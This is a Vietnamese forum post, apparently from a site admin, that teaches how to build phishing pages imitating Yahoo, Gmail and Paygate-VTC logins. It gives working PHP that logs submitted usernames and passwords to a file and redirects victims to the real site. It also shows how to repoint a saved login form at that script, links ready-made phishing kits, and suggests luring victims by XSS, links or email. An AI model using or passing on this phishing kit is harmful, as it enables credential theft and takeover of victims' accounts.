Hướng dẫn làm trang scam, fake yahoo, gmail...

[Admin]

- Yêu cầu của mình là khi bạn đọc hướng dẫn bạn làm theo và bạn phải hiểu vấn đề vì sao phải làm thế này thế kia
- Cái này thì cũ rích từ thời Hùng Vương đến giờ rùi, nhưng đôi lúc vẫn cần vất ra sử dụng đó ... Đồ cũ mà lại hiếm và hay nhìu người ko để ý.
1/ Đầu tiên mở notepad gõ vào nội dung sau:

<?
$now = date("H:i:s Y-m-d");
$ten = $_POST['login'];
$matkhau = $_POST['passwd'];
$f=fopen("yahoo_.txt","a");
fwrite($f," $now ---- User: $ten ---- Pass: $matkhau ----\n");
fclose($f);
?>
<html><body>
<script>location.href="http://mail.yahoo.com"</script>
</body></html>

Lưu lại với tên yahoo.php
2/ Tạo thêm 1 file y.txt với nội dung trống rỗng nữa
3/ Vào trang mail.yahoo.com save as toàn bộ trang web lại
- Mở file htm lên bằng wordpad hoặc bằng trình soạn thảo nào đó như Notepad, Notepad++,EditPlus...
Tìm dòng:

<form method="post" action="https://login.yahoo.com/config/login?" autocomplete="off" name="login_form" onsubmit="return hash2(this)">  
Và thay thế vào đó
<FORM name="login_form" action="y.php" method="post">

4/ Bây giờ bạn chỉ cần up lên host (host hỗ trợ php). Và CHMOD file y.txt là 777
5/ Xong...
+++ngoài ra các bạn có thể giả mạo form đăng nhập bất kì site nào bằng cách tương tự như trên
Vài code làm sẵn cho ai lười
+Fake yahoo
http://www.mediafire.com/?i83n4m3c1p5fjw1
+Fake gmail
http://www.mediafire.com/?dhsb7d4bk1bd68c
+Fake Paygate - VTC
http://www.mediafire.com/?9phab5g97jkk5gj
- Còn làm sao để người ta đăng nhập bằng trang yahoo mạo đó thì do bạn: lợi dụng bug xss, hay gởi link đến nạn nhân dụ dỗ, hay email ... tùy ứng của bạn
Good luck! mong là bạn không bị đáp gạch =))